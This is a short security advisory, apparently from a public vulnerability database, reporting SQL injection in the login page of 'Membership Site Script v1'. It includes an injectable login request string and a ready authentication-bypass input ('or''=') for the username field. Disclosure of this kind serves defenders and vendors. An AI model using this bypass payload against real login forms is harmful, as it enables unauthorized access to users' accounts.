Membership Site Script 1 SQL Injection

2017.03.24
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################ #Title: Membership Site Script v1 - SQL injection #Credit: Bilal KARDADOU #Vendor: http://www.turnkeycentral.com #Vendor URL: http://www.turnkeycentral.com/scripts/membership-site-script/ #Product: Membership Site Script v1 #Google Dork: N/A ################################################ # # Product & Service Introduction: # # "Membership Site Script" # Do you want to Launch Your Own Membership Site That Grows Automatically on AutoPilot? With a membership site, # your customers sign up and pay a monthly fee to gain access to special, private, members-only content. # The content might be eBooks, scripts, articles, graphics, coaching audio or video a whatever you want. # # http://localhost/membershipscript/login.php # submit=1&email=demo@gmail.com[SQL]&password=123456 # # # Authentication Bypass : # http://localhost/membershipscript/login.php # Username: test@test.com 'or''=' # Password: [empty] # # PoC: # http://prnt.sc/en4u2s # http://prnt.sc/en4tze # Bilal KARDADOU - https://www.linkedin.com/in/kardadou/) ################################################ -- *Bilal Kardadou* IT Security Consultant *E* : b.kardadou@capvalue.ma | *E* : bilalkardadou@gmail.com |


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top